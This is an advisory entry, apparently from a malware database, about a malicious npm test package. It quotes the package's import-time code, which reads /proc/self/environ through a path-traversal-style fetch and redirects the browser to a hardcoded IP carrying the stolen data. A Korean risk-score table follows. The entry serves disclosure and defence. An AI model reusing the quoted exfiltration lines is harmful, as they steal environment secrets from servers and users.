Malicious code in @a91082900/test_package (npm)
-= Per source details. Do not edit below this line.=-
The package's main file (index.js) executes at module load, with no exports and no user-invoked API. On import it issues fetch('/api/notes?id=/self/proc/environ') and then assigns top.location = 'http://128.199.217.232/?notes=' + encodeURIComponent(data), relaying whatever the vulnerable endpoint returns (a path-traversal-shaped request for the server process's environment variables) to a hardcoded bare IPv4 address over plain HTTP. Package metadata is placeholder ('no description', generic author handle) and there is no library functionality — this is a PoC/exfil payload packaged as an npm module. Any installer bundling this into a web application would redirect victim browsers to the attacker IP with exfiltrated data in the query string. Import-time execution + hardcoded bare-IP C2 + plaintext HTTP + a request path specifically crafted to read /proc/self/environ together leave no benign interpretation.
왜 이 VPI인가 (설명가능 · 실험적)
VPI 산정 기준
| 영향도(기본값(정보 없음)) | 55.00 |
| 악용 신호(추가 악용신호 없음) | ×1.00 |
| VPI | 55.00 |
VPI 공식 vpi-v1 기준